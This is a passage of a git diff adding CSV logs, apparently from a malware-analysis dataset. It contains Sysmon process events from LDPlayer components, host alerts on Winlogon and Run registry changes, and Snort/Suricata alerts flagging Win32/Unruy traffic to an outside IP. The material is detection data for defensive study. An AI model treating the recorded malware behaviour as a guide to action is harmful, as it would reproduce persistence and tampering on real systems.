Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""net\"" start cryptsvc\r\nCurrentDirectory: C:\\ChangZhi\\LDPlayer\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300}\r\nLogonId: 0x375CE\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076\r\nParentProcessGuid: {df9fc3d3-b3c0-5ecf-0000-001099ea2200}\r\nParentProcessId: 5136\r\nParentImage: C:\\ChangZhi\\LDPlayer\\dnrepairer.exe\r\nParentCommandLine: \""C:\\ChangZhi\\LDPlayer\\dnrepairer.exe\"" listener=197560\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:13.698"",""processGuid"":""{df9fc3d3-b3c1-5ecf-0000-00102b092300}"",""processId"":""8040"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""net\\\"" start cryptsvc"",""currentDirectory"":""C:\\\\ChangZhi\\\\LDPlayer\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020ce750300}"",""logonId"":""0x375ce"",""terminalSessionId"":""1"",""integrityLevel"":""High"",""hashes"":""MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076"",""parentProcessGuid"":""{df9fc3d3-b3c0-5ecf-0000-001099ea2200}"",""parentProcessId"":""5136"",""parentImage"":""C:\\\\ChangZhi\\\\LDPlayer\\\\dnrepairer.exe"",""parentCommandLine"":""\\\""C:\\\\ChangZhi\\\\LDPlayer\\\\dnrepairer.exe\\\"" listener=197560""}}}", +"May 31, 2020 @ 14:09:33.173",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:35.812 +ProcessGuid: {df9fc3d3-b39b-5ecf-0000-001001d41d00} +ProcessId: 7256 +Image: C:\Windows\SysWOW64\taskkill.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Terminates Processes +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: taskkill.exe +CommandLine: ""C:\Windows\System32\taskkill.exe"" /F /IM LdBoxSVC.exe /T +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300} +LogonId: 0x375CE +TerminalSessionId: 1 +IntegrityLevel: High +Hashes: MD5=07D18817187E87CFC6AB2A4670061AE0,SHA256=89D9BDF537EC43228448187779299AC347449361E067B0AD453BB54AD7EDB37E,IMPHASH=0D3E23DCB6BF63A9EB90D5BED57B4F89 +ParentProcessGuid: {df9fc3d3-b396-5ecf-0000-00105c1f1d00} +ParentProcessId: 7284 +ParentImage: C:\ChangZhi\LDPlayer\LDPlayer.exe +ParentCommandLine: ""C:\ChangZhi\LDPlayer\\LDPlayer.exe"" -silence -downloader -openid=100 -path=""C:\ChangZhi\LDPlayer\""""","\""C:\\Windows\\System32\\taskkill.exe\"" /F /IM LdBoxSVC.exe /T",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:35.820996400Z"",""eventRecordID"":""2207"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:35.812\r\nProcessGuid: {df9fc3d3-b39b-5ecf-0000-001001d41d00}\r\nProcessId: 7256\r\nImage: C:\\Windows\\SysWOW64\\taskkill.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Terminates Processes\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: taskkill.exe\r\nCommandLine: \""C:\\Windows\\System32\\taskkill.exe\"" /F /IM LdBoxSVC.exe /T\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300}\r\nLogonId: 0x375CE\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: MD5=07D18817187E87CFC6AB2A4670061AE0,SHA256=89D9BDF537EC43228448187779299AC347449361E067B0AD453BB54AD7EDB37E,IMPHASH=0D3E23DCB6BF63A9EB90D5BED57B4F89\r\nParentProcessGuid: {df9fc3d3-b396-5ecf-0000-00105c1f1d00}\r\nParentProcessId: 7284\r\nParentImage: C:\\ChangZhi\\LDPlayer\\LDPlayer.exe\r\nParentCommandLine: \""C:\\ChangZhi\\LDPlayer\\\\LDPlayer.exe\"" -silence -downloader -openid=100 -path=\""C:\\ChangZhi\\LDPlayer\\\""\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:35.812"",""processGuid"":""{df9fc3d3-b39b-5ecf-0000-001001d41d00}"",""processId"":""7256"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\taskkill.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Terminates Processes"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""taskkill.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\taskkill.exe\\\"" /F /IM LdBoxSVC.exe /T"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020ce750300}"",""logonId"":""0x375ce"",""terminalSessionId"":""1"",""integrityLevel"":""High"",""hashes"":""MD5=07D18817187E87CFC6AB2A4670061AE0,SHA256=89D9BDF537EC43228448187779299AC347449361E067B0AD453BB54AD7EDB37E,IMPHASH=0D3E23DCB6BF63A9EB90D5BED57B4F89"",""parentProcessGuid"":""{df9fc3d3-b396-5ecf-0000-00105c1f1d00}"",""parentProcessId"":""7284"",""parentImage"":""C:\\\\ChangZhi\\\\LDPlayer\\\\LDPlayer.exe"",""parentCommandLine"":""\\\""C:\\\\ChangZhi\\\\LDPlayer\\\\\\\\LDPlayer.exe\\\"" -silence -downloader -openid=100 -path=\\\""C:\\\\ChangZhi\\\\LDPlayer\\\\\\\""""}}}", diff --git a/data/MW_31_NIDS.csv b/data/MW_31_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_31_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/MW_32_HIDS_3.csv b/data/MW_32_HIDS_3.csv new file mode 100644 index 0000000..8391e3f --- /dev/null +++ b/data/MW_32_HIDS_3.csv @@ -0,0 +1,28 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 31, 2020 @ 14:49:54.640",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '5002e9cbd059c227b20768b5773a5158' +New md5sum is : '5180a3b0722c82316724334d9433e623' +Old sha1sum was: 'd451102b00da6ad0bf180b4f73a88db73c0000e8' +New sha1sum is : 'fec2fcb119fff56cdc62ef38a54b5875d12dee87' +", +"May 31, 2020 @ 14:49:54.610",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '4106a3aec9d1eebddfcfbf931654376c' +New md5sum is : 'ab54055d4340717a94412ced486155e6' +Old sha1sum was: 'dbffbab9a0cf7bfda50a68d20d36c21299d2169d' +New sha1sum is : 'f08b082e962682e26ea4772b2010776e1eafced1' +", +"May 31, 2020 @ 14:49:50.313",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa' +New md5sum is : '1c729912f87f9abbd1574176fc5996f7' +Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +", +"May 31, 2020 @ 14:48:27.933",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 31, 2020 @ 14:48:18.785",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 31, 2020 @ 14:46:57.263",7,"Integrity checksum changed.",,,,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: '6491bfbb48f449e8ef2da21bf4925908' +New md5sum is : 'c1e81fff51d7a32e2fdecbd74d4a1e36' +Old sha1sum was: 'a659aa851c1408487eefa829ad359673b7fb1288' +New sha1sum is : '49a93a3b033356aaf5c778d70b915ce41c083b45' +", +"May 31, 2020 @ 14:45:50.819",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = DESKTOP-HUE026H\John Williams; ClientProcessId = 1440; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory WHERE Tag='Physical Memory 0'; ResultCode = 0x80041032; PossibleCause = Unknown""",,,, diff --git a/data/MW_32_NIDS.csv b/data/MW_32_NIDS.csv new file mode 100644 index 0000000..90042ce --- /dev/null +++ b/data/MW_32_NIDS.csv @@ -0,0 +1,7 @@ +"@timestamp",message,"log.file.path" +"May 31, 2020 @ 14:45:37.543","05/31-14:45:36.564461 [**] [1:2833818:3] ETPRO MALWARE Win32/Unruy Rogue Search Host Observed 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50104 -> 35.186.238.101:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 14:45:37.524","05/31/2020-14:45:36.661787 [**] [1:2833818:3] ETPRO ADWARE_PUP Win32/Unruy Rogue Search Host Observed 2 [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50104 -> 35.186.238.101:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 14:44:57.514","05/31/2020-14:44:55.725718 [**] [1:2833817:3] ETPRO ADWARE_PUP Win32/Unruy Rogue Search Host Observed 1 [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50037 -> 35.186.238.101:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 14:44:57.514","05/31-14:44:55.628541 [**] [1:2833817:3] ETPRO MALWARE Win32/Unruy Rogue Search Host Observed 1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50037 -> 35.186.238.101:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 14:44:54.512","05/31/2020-14:44:53.277765 [**] [1:2833817:3] ETPRO ADWARE_PUP Win32/Unruy Rogue Search Host Observed 1 [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50023 -> 35.186.238.101:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 14:44:54.511","05/31-14:44:53.177467 [**] [1:2833817:3] ETPRO MALWARE Win32/Unruy Rogue Search Host Observed 1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50023 -> 35.186.238.101:80","/var/log/snort/alert.fast" diff --git a/data/MW_3_HIDS_1.csv b/data/MW_3_HIDS_1.csv new file mode 100644 index 0000000..77fdd45 --- /dev/null +++ b/data/MW_3_HIDS_1.csv @@ -0,0 +1,637 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 4, 2020 @ 15:21:58.873",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'a42aba8bfc3fa20348a9721ae0ca3460' +New md5sum is : '192c78418fb597c9cf6128a0792f79aa' +Old sha1sum was: 'e9eb87c9f46d8fb813cc6fdd1b8c16b59b46ad4f' +New sha1sum is : 'c9aa48747848a82c29d96f119a4b1209deec6497' +" +"Apr 4, 2020 @ 15:21:58.855",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'b0509f8ae7589a36b0e922ea55370a2a' +New md5sum is : 'd65ee627cdc29661ff2de1939cdd428b' +Old sha1sum was: '7c173f25809414b691ff85859d444a8615734f04' +New sha1sum is : '115611e9c69eb0bb2ce1573caa4b9500ca07e3ee' +" +"Apr 4, 2020 @ 15:21:55.371",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2b7cd' was added. +" +"Apr 4, 2020 @ 15:21:55.354",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:21:48.385",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: '0537eac2a8f888ccfe2ff7c9cb88eba4' +New md5sum is : 'f7ede040f0bd50f2432cce9ba9720243' +Old sha1sum was: '011c9cae6591b6ed5bc8cf0ad3eebcd91c70322c' +New sha1sum is : '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +" +"Apr 4, 2020 @ 15:21:48.356",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'df9be7629f6b4bb426436fddfdda3e00' +New md5sum is : 'b919215c1cb7c2c9b5ca2a5dcb9cdede' +Old sha1sum was: '27944b26d8cfd2e43728eb7197de1c8f824a233d' +New sha1sum is : 'b64c8005bb43c0f56d3b57f7a3664059577f794e' +" +"Apr 4, 2020 @ 15:21:48.325",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'eef4559e7fd1bceae06925bdc22dd84b' +New md5sum is : 'c6fd10eeaa5117c25b87d0cf58c03329' +Old sha1sum was: '5e9ea0459e03ac8fca6d6a6e915584a6d0419d0a' +New sha1sum is : 'c017e56700c44e16721f94431d25c19503937da0' +" +"Apr 4, 2020 @ 15:21:47.901",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\Config' checksum changed. +Old md5sum was: '1a84f72dabd954f40c6c8b3797efe69e' +New md5sum is : '16f1307dee1a5c080b4690a068293d01' +Old sha1sum was: 'b71e6aac68f5b97f000e7e4cb61948fc0911b20c' +New sha1sum is : '2556215c3fc2ed705fcd1350dae945c7a9be0a7c' +" +"Apr 4, 2020 @ 15:21:47.683",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '70803ff74c6137bb9c30faef6663c67e' +New md5sum is : '1f5f47a432707b7a9ceb822363299e78' +Old sha1sum was: '6fcc6a87284459c8396289b99fe1d19b455650f3' +New sha1sum is : '769c33f5c4fca3518398159bd417f442803c5d9b' +" +"Apr 4, 2020 @ 15:21:46.592",3,"Windows Logon Success", +"Apr 4, 2020 @ 15:21:46.262",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: '1935e9f379e872308a49f6d8f4863bc5' +New md5sum is : 'e9d96c4f08fa655c42db7df4a5acb08c' +Old sha1sum was: 'c9ae2d75231460ef4dab9ce1033d917d8630f141' +New sha1sum is : '8e7fbf7b3eb684559c3317fee8a56fc267f4a434' +" +"Apr 4, 2020 @ 15:21:45.980",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '96f3da64bf19dc1bd781394ccce1fbeb' +New md5sum is : '759d28f3c4daf9bd3a1b6167e51768f0' +Old sha1sum was: 'd27fb1d8e05747b9210064f64aa3c8d84f5e96a6' +New sha1sum is : '538d88752a9e2247561c2c1bcc242887a2f14a8b' +" +"Apr 4, 2020 @ 15:21:45.293",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:21:45.280",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:21:45.155",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: '44e16df733261010319c89f3decf1694' +New md5sum is : 'dd770a92bcb4d716d1fff91aba0a204e' +Old sha1sum was: 'b18203806fe0dae10954bb7bb39c25b8b0d4e978' +New sha1sum is : 'f0f01b5151126b20a75ccdd550d126c6542fdef6' +" +"Apr 4, 2020 @ 15:21:44.995",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '4559d805700630cd4bcb2f3aec755c25' +New md5sum is : 'd7f681bed4f556d2db6534fdfc35d91d' +Old sha1sum was: '058f1b6c28e41a92ba1b747585b9ac8a56baec34' +New sha1sum is : '0ad5cfd8da8bfd2beb511d8a1f337f5091029df9' +" +"Apr 4, 2020 @ 15:21:44.604",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:21:44.574",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:21:44.058",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: '1935e9f379e872308a49f6d8f4863bc5' +New md5sum is : '80751be84fe783fc4c0bc870838a3434' +Old sha1sum was: 'c9ae2d75231460ef4dab9ce1033d917d8630f141' +New sha1sum is : '1c2b3822d9de8136120a203722a5860b3c368348' +" +"Apr 4, 2020 @ 15:21:40.635",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: '4c3f002c2542e6c47bd1e5d5526ad531' +New md5sum is : 'ab91aa026c192dd4aa68d5f026066612' +Old sha1sum was: '00ea6b590c5fa5bcac5c671a151c31127ac60089' +New sha1sum is : 'a0938a8d4d20576317a2d3d5115857097801bba3' +" +"Apr 4, 2020 @ 15:21:37.875",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 15:21:37.277",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '5d8658099109c05a39f0550c9fe2078d' +New md5sum is : '3d3a643354245020081ae89e531e5f43' +Old sha1sum was: 'bd60f0594b3758e2b86084c77d5b75b32d4df8b1' +New sha1sum is : '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +" +"Apr 4, 2020 @ 15:21:35.605",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '4ec372e5c956917c47740315de22f258' +New md5sum is : 'd821b0451d0ccaee48c2e3056715cfa6' +Old sha1sum was: '1ebd67340dfc660448dc620eb68e7fb4cf9c565a' +New sha1sum is : '17c9c5437458287926b0cdd4cf95a72ba80b7cb0' +" +"Apr 4, 2020 @ 15:21:35.058",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: 'e25d33057cf71b330830d5e95b124fe5' +New md5sum is : '3c9907f337ed2c00e7706d077193eb81' +Old sha1sum was: '624751317ab817d1c615abbd24c010d370e34268' +New sha1sum is : 'c77498926ea2ec4a1f354669f5a247c764d2ad51' +" +"Apr 4, 2020 @ 15:21:35.011",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '06e3a0893e8471fe1ad4937da2a83d5f' +New md5sum is : '5de0ef21cee3c7b87f2fab30b8b06e2e' +Old sha1sum was: '0b07d04f35b9382f85cdc6152e8d39398c1f055b' +New sha1sum is : '95450da791d27d0a0e456663988211c24b30dbec' +" +"Apr 4, 2020 @ 15:21:34.995",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '5fb1e28e9e1ea88c6ada6523c4164966' +New md5sum is : '0b017ce491fd1b22003082d2585a1327' +Old sha1sum was: 'd1f49ffeb1bbc4493fe5bce52eaf75cccf81560c' +New sha1sum is : 'aba803556e14ebf646bb03cbc539cb30b783ee41' +" +"Apr 4, 2020 @ 15:21:30.213",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'a790734f197ecec9285de0c7c3ee54a1' +New md5sum is : 'b94f00fb649e58278413ddb218687776' +Old sha1sum was: '2a056b4354493d8181a6997a08b72094f1778f22' +New sha1sum is : '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +" +"Apr 4, 2020 @ 15:21:28.213",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:21:28.198",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:21:27.527",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:21:27.509",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:21:26.308",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:21:26.288",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:21:22.128",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '3afaf17706b569cfc181c32e11e3e1e3' +New md5sum is : 'a0da4edfc8c86d5c2f328cbea9d3d099' +Old sha1sum was: '4d4da11dce9a318cf536df3a5f5d41a6c41f70dd' +New sha1sum is : 'bf485c9d0d54845bee69171208deaf1995e19353' +" +"Apr 4, 2020 @ 15:21:18.061",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '582b366b698c74fe5d3e40a47e1b8010' +New md5sum is : 'f079a7c2cde745dfaa7735dccfd02c41' +Old sha1sum was: '8961c68f641a2a7819a49e53b3c6e5e24bcee551' +New sha1sum is : 'f8cf1f3dcf5c617ee8d59ad6a81a619341529bc2' +" +"Apr 4, 2020 @ 15:21:16.803",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: '1f292403ac7b268e3b11f111ded67e2c' +New md5sum is : 'c5eb944f3cdfc8f8d032d5b0468dfb60' +Old sha1sum was: 'c336ebf7d883f128c8920b416859ef494e2e018c' +New sha1sum is : 'db662f811919aeadcded022158babc95bac56752' +" +"Apr 4, 2020 @ 15:21:16.635",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2b7cd' was added. +" +"Apr 4, 2020 @ 15:21:16.606",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2b7cd\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 15:21:16.533",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:21:10.969",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: '1e18b407d6fa2ba2ca94f603ba4f26b4' +New md5sum is : '811afeeeaebe9434f2200e491b65992c' +Old sha1sum was: '0df5dd168081c6678164f4e60dce87117ddfa87e' +New sha1sum is : '38c8fba2ccf9a7f7ec0e12aebb8ddd91eb350900' +" +"Apr 4, 2020 @ 15:21:09.607",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '3afaf17706b569cfc181c32e11e3e1e3' +New md5sum is : 'a0da4edfc8c86d5c2f328cbea9d3d099' +Old sha1sum was: '4d4da11dce9a318cf536df3a5f5d41a6c41f70dd' +New sha1sum is : 'bf485c9d0d54845bee69171208deaf1995e19353' +" +"Apr 4, 2020 @ 15:21:06.841",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'da7d5ec8cdd7285f49105e5efe9c6bb8' +New md5sum is : '6755fd8126a3ec89524601d2953e0be3' +Old sha1sum was: 'eb0efa8d18c93a3996afdf9ff649e81a5d40b033' +New sha1sum is : '290387848f6b7d7ef055483799ff8a0ac26b6663' +" +"Apr 4, 2020 @ 15:21:06.081",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '3afaf17706b569cfc181c32e11e3e1e3' +New md5sum is : 'a0da4edfc8c86d5c2f328cbea9d3d099' +Old sha1sum was: '4d4da11dce9a318cf536df3a5f5d41a6c41f70dd' +New sha1sum is : 'bf485c9d0d54845bee69171208deaf1995e19353' +" +"Apr 4, 2020 @ 15:21:05.060",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '180219dd3d5cd4e9bd4f437e6b975dc1' +New md5sum is : '8babdce3ab05d3473a80df927d06237f' +Old sha1sum was: 'c8b4a3f4d649c55502e3e419db9da373945302cb' +New sha1sum is : 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +" +"Apr 4, 2020 @ 15:21:00.123",3,"Windows Logon Success", +"Apr 4, 2020 @ 15:20:55.047",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'c5c6ddae9a35331147842cd5448debe5' +New md5sum is : '752d02e3caedd553c0777cceab48739a' +Old sha1sum was: 'cba0805b3a87df3e8916c67705d47828f0618ed0' +New sha1sum is : 'd088d26eabd27ded9310455e6838e2296ba41013' +" +"Apr 4, 2020 @ 15:20:47.544",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '385c9184ac544829488be8ce5b5671ff' +New md5sum is : 'd48e4ad1513d228238afb53902df064f' +Old sha1sum was: 'fa617e764e334ea237bea1af00d403f462f50d6f' +New sha1sum is : '35582ea845e1fcd5f80387607ffae37f3b9bb20a' +" +"Apr 4, 2020 @ 15:20:46.091",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:46.075",5,"File added to the system.","File 